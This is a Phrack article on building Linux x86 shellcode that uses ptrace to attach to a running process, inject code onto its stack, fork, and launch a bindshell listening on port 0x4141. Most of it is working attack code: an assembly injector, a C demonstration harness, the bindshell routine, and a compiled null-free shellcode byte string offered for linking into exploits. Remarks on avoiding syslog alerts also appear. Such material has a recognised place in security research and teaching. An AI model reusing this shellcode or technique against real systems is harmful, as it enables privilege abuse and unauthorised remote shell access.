==Phrack Inc.== Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12 |=---------------=[ Building ptrace injecting shellcodes ]=--------------=| |=-----------------------------------------------------------------------=| |=------------=[ anonymous author long int ptrace(enum __ptrace_request request, pid_t pid, void * addr, void * data) 'request' is a symbolic constant declared in sys/ptrace.h . We shall use those : PTRACE_ATTACH : Attach to the process pid. PTRACE_DETACH : ugh, Detach from the process pid. Never forget to do that, or your traced process will stay in stopped mode, which is unrecoverable remotely. PTRACE_GETREGS : This command copy the process registers into the struct pointed by data (addr is ignored). This structure is struct user_regs_struct defined as this, in asm/user.h : struct user_regs_struct { long ebx, ecx, edx, esi, edi, ebp, eax; unsigned short ds, __ds, es, __es; unsigned short fs, __fs, gs, __gs; long orig_eax, eip; unsigned short cs, __cs; long eflags, esp; unsigned short ss, __ss; }; PTRACE_SETREGS : This command has the opposite meaning of PTRACE_GETREGS, with same arguments PTRACE_POKETEXT : This command copies 32 bits from the address pointed by data in the addr address of the traced process. This is equivalent to PTRACE_POKEDATA. An important thing when you attach a pid is that you have to wait for the traced process to be stopped, and so have to wait for the SIGCHLD signal. wait(NULL) does this perfectly (implemented in the shellcode by waitpid). 3.2 - How does the library make the call As we are writing asm code, we have to know how to call directly the ptrace system call. Little tests may show us the way the library uses to wrap the syscalls, and simply : eax is SYS_ptrace (26 decimal) ebx is request (e.g. PTRACE_ATTACH is 16) ecx is pid edx is addr esi is data in error case, -1 is stored in eax. ---[ 4 - Injecting code in a process - C code 4.1 - The stack is our friend I've seen some injection mechanism used by some ptrace() exploits for linux, which injected a standard shellcode into the memory area pointed by %eip. That's the lazy way of doing injection, since the target process is screwed up and can't be used again. (crashes or doesn't fork) We have to find another way to execute our code in the target process. That's what I was thinking and I found this : 1- Get the current eip of the process, and the esp. 2- Decrement esp by four 3- Poke eip address at the esp address. 4- Inject the shellcode into esp - 1024 address (Not directly before the space pointed by esp, because some shellcodes use the push instruction) 5- Set register eip as the value of esp - 1024 6- Invoke the SETREGS method of ptrace 7- Detach the process and let it open a root shell for you :) The reason of non-usability on systems with nonexec stack is that the shellcode is uploaded onto the stack. That's a /feature/, not a bug. I've heard of methods saving the memory context of the traced process, uploading shellcode, wait it to finish (usually after the fork) and then restoring the old state of the traced process. That's a way, but I don't think it is really efficient because modern non-exec patches also avoid ptracing of unrestricted processes. (At least grsec does that.) The target stack may look as this : [DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP] ^> Original esp points here new eip<^ new<^>esp points here Something important to do before the exploitation is to put two nops bytes before the shellcode. Reason is simple : if ptrace has interrupted a syscall being executed, the kernel will subtract two bytes from eip after the PTRACE_DETACH to restart the syscall. 4.2 - Code to inject The code to inject has to work peacefully with the stack we have set up for it : it may fork(), and let the original process continue its job. The new process may launch a bindshell ! Here's the code of s1.S , compilable with gcc : /* all that part has to be done into the injected process */ /* in other word, this is the injected shellcode */ .globl injected_shellcode injected_shellcode: // ret location has been pushed previously nop nop pusha // save before anything xor %eax,%eax mov $0x02,%al //sys_fork int $0x80 //fork() xor %ebx,%ebx cmp %eax,%ebx // father or son ? je son // I'm son //here, I'm the father, I've to restore my previous state father: popa ret /* return address has been pushed on the stack previously */ // code finished for father son: /* standard shellcode, at your choice */ .string "" local@darkside:~/dev/ptrace$ gcc -c s1.S Explanations : The first two nops are the nops I've discussed just before, because in my final shellcode I choose to decrement the destination buffer source address by two. The pusha saves all the registers on the stack, so the process may restore them just after the fork. (I say eax and ebx) If the return value of fork is zero, this is the son being executed. There we insert any style of shellcode. If the return value is not zero (but a pid), restore the registers and the previously saved eip. The program may continue as if nothing has happened. 4.3 - Our first C code Lot of theory, now a little practical example. Here is a program which will fork, attach its son, inject it the code, let it run and after kill it. So, there is p2.c : #include #include #include #include typedef long int pid_t; void injected_shellcode(); char *hello_shellcode= "\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59" "\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34" "\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c" "\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21" ; /* Prints hello. What a deal ! */ char *shellcode; int child(){ while(1){ write(2,".",1); sleep(1); } return 0; } int father (pid_t pid){ int error; int i=0; int ptr; int begin; struct user_regs_struct data; if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL)) perror("attach"); waitpid(pid,NULL,0); if(error=ptrace(PTRACE_GETREGS,pid,&data,&data)) perror("getregs"); printf("%%eip : 0x%.8lx\n",data.eip); printf("%%esp : 0x%.8lx\n",data.esp); data.esp -= 4; ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip); ptr=begin=data.esp-1024; printf("Inserting shellcode into %.8lx\n",begin); data.eip=(long)begin+2; ptrace(PTRACE_SETREGS,pid,&data,&data); while(i1) pid=atoi(argv[1]); shellcode=malloc( strlen((char*) injected_shellcode) + strlen(hello_shellcode) + 4); strcpy(shellcode,(char *) injected_shellcode); strcat(shellcode,(char *) hello_shellcode); printf("p2 : trying to launch shellcode on forked process\n"); if(pid==0) pid=fork(); if (pid){ printf("I'm the father\n"); sleep(2); father(pid); sleep(2); kill(pid,9); wait(NULL); }else{ printf("I'm the child\n"); child(); } return 0; } Compile all that with gcc -o p2 p2.c s1.S and admire my cut & paste skillz local@darkside:~/dev/ptrace$ ./p2 p2 : trying to launch shellcode on forked process I'm the father I'm the child ...%eip : 0x400c0a11 %esp : 0xbffff470 Inserting shellcode into bffff06c .Hello,World !. It really happened. the .... process forked and then printed "Hello, world!". 5 - First try to shellcodize it Before doing it, we have to remember our rules. I'll program it without really optimizing it in size (I let bighawk or pr1 do that) but designing with pre-compiler conditional assemble. gcc -DLONG for a very careful shellcode (checks etc...) gcc -DSHORT for a very tiny shellcode (which does the minimum but unsafe). So, if size really matters, we can exit(0) simply by jumping anywhere, or if size does not matter at all, we can make draconian tests. I will use at&t syntax, compilable with gcc. If you don't like it, a good (and big) awk script may do the trick. 5.1 When you need some body to trace A basic approach is first to set the stack pointer to a high value. We can't be certain that the stack pointer is not less than current eip (in the case of a stack based overflow). The easier (and laziest) way to do this is to set esp to 0xbffffe04. This esp value works on nearly all linux/x86 boxes I've seen, and is near the stack bottom, but not too much, and doesn't contain a zero. Then, we get the ppid process with the getppid() syscall. Next, first try to attach it. If the attach fails, 99% chances are that the ppid is init. In this case, we increment the pid until we can attach something. (Warning, debugging this part of code is not easy at all. When you trace a process, you become its ppid. In this case, the shellcode will attach your debugger and a mutual deadlock will appear. Who told "A cool/good anti-debugger technique ?") So I included a test for the DEBUG_PID preprocessor variable. Put there whatever pid you want to inject something in. Note that the pid is put on the stack, at the 12(%ebp) place. That's useful because we will need it in nearly all system calls. 5.2 Waiting (for love ?) Now, little shellcode has to wait for its child. There are two ways of doing this : - waitpid(pid,NULL,NULL); - big big loop; As I didn't success to make a reasonably short (in time) loop smaller in size than the syscall, the code contains only the system call. 5.3 Registers where are you ? The target process is ready to be modified, but the first thing to do with it is to extract the registers. The ebp register is saved into esi, and then esi is incremented by 16. It will be the "data" argument of the ptrace call. So, after the syscall, target registers are beginning at 16(%ebp). Interesting registers are : esp : 76(%ebp) eip : 64(%ebp) The register tricks I have described before are in the shellcode source, but are not so complicated, including the "push"-like instruction to push the old eip address. 5.4 Upload in progress "Uploading" the shellcode, or injecting it in the target process, is just a little loop. The shellcode itself is not really clear because the loop counter used is esp. We set esp with the value specified in macro SHELLCODELEN. In edi, we set the memory address of the injected shellcode in the current process. Edx contains the target address, previously decremented of two conforming to our first note about this. As after the interrupt call, eax must be zero, we can safely use it to test if esp reached the final state. 5.5 You'll be a man, my son. We can safely detach the process now. If we forget to detach (laziness or simply spaceless) the process will remain in interrupted state, which needs a SIGCONT to launch our bindshell. After this hard work, shellcode can exit, simply by the exit() syscall which usually doesn't alarm inetd or such and doesn't create any alarming note in syslog. (for the cute version, "ret" may be enough to segfault and so close the process.) The bindshell I included binds port 0x4141. Remember that two fast executions of the shellcode may block the port 0x4141 for minutes. That was quite annoying while coding this. The shellcode hasn't been optimized in size yet. You can compile the attached code with gcc -DLONG -c -o injector.o injector.S and linking it with your favourite exploit. Code is 100% null-chars free. I didn't look for newlines, carriage returns, spaces, percents, 0xff, etc... ---[ 6 - References and greetings Man page of ptrace() is cool, lucid, informative, and so on. Intel documentation book 2 : the instructions was an useful book full of 1-byte-instructions-which-does-everything. Special greets to the other guys from minithins.net, UNF people, my tender girlfriend and to at&t who made their own cool asm syntax. Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for their special support, and especially to double-p ,fozzy and OUAH who corrected my lame english and gave me some advices. /* INJECTOR.S VERSION 1.0 */ /* Injects a shellcode in a process using ptrace system call */ /* Tested on : linux 2.4.18 */ /* NOT SIZE-OPTIMIZED YET */ #define SHELLCODELEN 30 /* That is, size of (the injected shellcode + bindshell)/4 */ #ifndef SHORT #define LONG #endif #ifdef LONG #undef SHORT #endif .text .globl shellcode .type shellcode,@function shellcode: /* injector begins here */ mov $0xbffffe04,%esp /* first thing, we have to find our ppid */ xor %eax,%eax mov $64,%al /* sys_getppid */ int $0x80 #ifdef DEBUG_PID mov $DEBUG_PID,%ax #endif /* put it on the stack */ mov %esp,%ebp /* save the stack in stack pointer */ mov %eax,12(%ebp) /* save the pid there */ /* now we have to do a ptrace */ redo: xor %eax,%eax mov $26,%al /* sys_ptrace */ mov 12(%ebp),%ecx mov %eax,%ebx mov $0x10,%bl /* PTRACE_ATTACH */ int $0x80 /* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */ xor %ebx,%ebx cmp %eax,%ebx je good /* we are not leet enough, or ppid is init */ inc %ecx mov %ecx,12(%ebp) jmp redo good: /* now we have to do a waitpid(pid,NULL,NULL) */ mov %eax,%edx /* NULL */ mov %ecx,%ebx /* pid */ mov %edx,%ecx /* NULL */ mov $7,%al /* SYS_waitpid */ int $0x80 getregs: /* now get its registers */ xor %eax,%eax /* Should waitpid return 0 ? never ;) */ xor %ebx,%ebx mov %ebp,%esi add $16,%esi /* 16 up of the stack pointer */ mov $12,%bl /* %ebx is zero, PTRACE_GETREGS */ mov 12(%ebp),%ecx /* pid */ mov $26,%al /* %eax is zero. */ /* %edx doesn't contain anything since PTRACE_GETREGS doesn't use addr */ int $0x80 /* so now we have registers in 16(%ebp) */ /* two interresting : %eip and %esp */ /* %eip : (16+48)(%ebp) */ /* %esp : (16+60)(%ebp) */ /* rq : 12(%ebx) contains ppid */ /* 8(%ebx) will contain the eip */ custom_push: sub $4,76(%ebp) /* dec the esp */ mov 76(%ebp),%edi /* put it in our temp eip */ sub $1036,%di mov %edi,8(%ebp) /* that's the address where we */ /* shall start to install our code */ /* we need to push the eip at top of the stack */ mov $26,%al mov $4,%bl /* PTRACE_POKETEXT*/ mov 12(%ebp),%ecx /*ppid */ mov 76(%ebp),%edx /* esp we have decremented */ mov 64(%ebp),%esi /* old eip */ int $0x80 /* what a work for push %eip */ mov %edi ,64(%ebp) /* eip = our code nah, %edi == 8(%ebp) */ /* now put our cool registers set */ setregs: xor %eax,%eax xor %ebx,%ebx mov $26,%al mov $13,%bl /* PTRACE_SETREGS*/ /* ppid always set so %ecx */ /* %edx ignored */ mov %ebp,%esi add $16,%esi int $0x80 /* registers have been updated. now inject the shellcode */ /* %edi : location in memory where we put the shellcode */ jmp start goback: /* push on the stack the address of the shellcode to inject */ mov %edi,%edx /* addr */ dec %edx dec %edx /* returning from syscall, eip goes 2 before current eip */ /* with this trick, it goes on 2 nops */ pop %edi /* data */ xor %eax,%eax mov $SHELLCODELEN,%al mov %eax,%esp mov $4,%bl loop: mov $26,%al mov 12(%ebp),%ecx mov (%edi),%esi int $0x80 dec %esp add $4,%edx /* target shellcode */ add $4,%edi /* local shellcode, source */ cmp %esp,%eax /* Len > 0 ? */ jne loop detach: mov $26,%al xor %ebx,%ebx mov $0x11,%bl /* PTRACE_DETACH */ mov 12(%ebp),%ecx /* pid */ //xor %edx,%edx //xor %esi,%esi int $0x80 /* Now we can exit */ failed: #ifdef LONG xor %eax,%eax /* exit silently */ mov %eax,%ebx mov $1,%al /* sys_exit */ int $0x80 /* die in peace, poor child */ #endif #ifndef LONG ret #endif start: call goback /* all that part has to be done into the injected process */ /* in other word, this is the injected shellcode */ // ret location has been pushed previously nop nop pusha // save before anything by saving registers xor %eax,%eax mov $0x02,%al //sys_fork int $0x80 //fork() xor %ebx,%ebx cmp %eax,%ebx // father or son ? je son // I'm son //here, I'm the father, I've to restore my previous state father: popa ret /* code finished for the father */ son: /* standard shellcode, at your choice */ /* Bind shellcode */ lnx_bind: xor %eax,%eax cdq /* %edx= 0 */ push %edx /* IPPROTO_TCP */ inc %edx /* SOCK_STREAM */ mov %edx,%ebx /* socket() */ push %edx inc %edx /* AF_INET */ push %edx mov %esp,%ecx mov $102,%al int $0x80 mov %eax,%edi /* Save the socket in %edi */ cdq /* %edx= sign of %eax = 0 */ inc %ebx /* bind */ /* was 1, become 2 */ push %edx /* 0.0.0.0 addr */ /*change \/ here */ push $0x4141ff02 /* here, change the 0x4141 for the port */ /* /\ */ mov %esp,%esi /* save the address of sockaddr in %esi */ push $16 /* Size of this shit */ //$16 push %esi /* struct sockaddr * */ push %edi /* socket number */ mov %esp,%ecx /* bind() */ mov $102,%al int $0x80 /* Erf, I use the previous data on the stack, they are even good enough */ inc %ebx /*3...*/ inc %ebx /*4 */ mov $102,%al int $0x80 /* Listen(fd,somehug) (somehuge always > 0 so it's good) */ push %esp /* Len */ push %esi /* sockaddr* */ push %edi /* socket */ inc %ebx /* 5 */ mov %esp,%ecx mov $102,%al int $0x80 /* accept */ xchg %eax,%ebx /* Save our precious file descriptor */ pop %ecx /* take the value of %edi, that's usualy %ebx-1 */ duploop: mov $63,%al /* dup2 */ int $0x80 dec %ecx cmp %ecx,%edx jle duploop //jnl loop /* For each file descriptor before %ebx, dup2() it */ /* Std lnx_bin_sh_1 shellcode */ push %edx push $0x68732f6e push $0x69622f2f mov %esp,%ebx push %edx push %ebx mov %esp,%ecx mov $11, %al int $0x80 .string "" // compiled with -DLONG // binds to port 16705 char injector_lnx[]= "\xbc\x04\xfe\xff\xbf\x31\xc0\xb0\x40\xcd" "\x80\x89\xe5\x89\x45\x0c\x31\xc0\xb0\x1a" "\x8b\x4d\x0c\x89\xc3\xb3\x10\xcd\x80\x31" "\xdb\x39\xc3\x74\x06\x41\x89\x4d\x0c\xeb" "\xe7\x89\xc2\x89\xcb\x89\xd1\xb0\x07\xcd" "\x80\x31\xc0\x31\xdb\x89\xee\x83\xc6\x10" "\xb3\x0c\x8b\x4d\x0c\xb0\x1a\xcd\x80\x83" "\x6d\x4c\x04\x8b\x7d\x4c\x66\x81\xef\x0c" "\x04\x89\x7d\x08\xb0\x1a\xb3\x04\x8b\x4d" "\x0c\x8b\x55\x4c\x8b\x75\x40\xcd\x80\x89" "\x7d\x40\x31\xc0\x31\xdb\xb0\x1a\xb3\x0d" "\x89\xee\x83\xc6\x10\xcd\x80\xeb\x34\x89" "\xfa\x4a\x4a\x5f\x31\xc0\xb0\x1e\x89\xc4" "\xb3\x04\xb0\x1a\x8b\x4d\x0c\x8b\x37\xcd" "\x80\x4c\x83\xc2\x04\x83\xc7\x04\x39\xe0" "\x75\xec\xb0\x1a\x31\xdb\xb3\x11\x8b\x4d" "\x0c\xcd\x80\x31\xc0\x89\xc3\xb0\x01\xcd" "\x80\xe8\xc7\xff\xff\xff\x90\x90\x60\x31" "\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xc3\x74" "\x02\x61\xc3\x31\xc0\x99\x52\x42\x89\xd3" "\x52\x42\x52\x89\xe1\xb0\x66\xcd\x80\x89" "\xc7\x99\x43\x52\x68\x02\xff\x41\x41\x89" "\xe6\x6a\x10\x56\x57\x89\xe1\xb0\x66\xcd" "\x80\x43\x43\xb0\x66\xcd\x80\x54\x56\x57" "\x43\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0" "\x3f\xcd\x80\x49\x39\xca\x7e\xf7\x52\x68" "\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" "\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ; /*size :279 */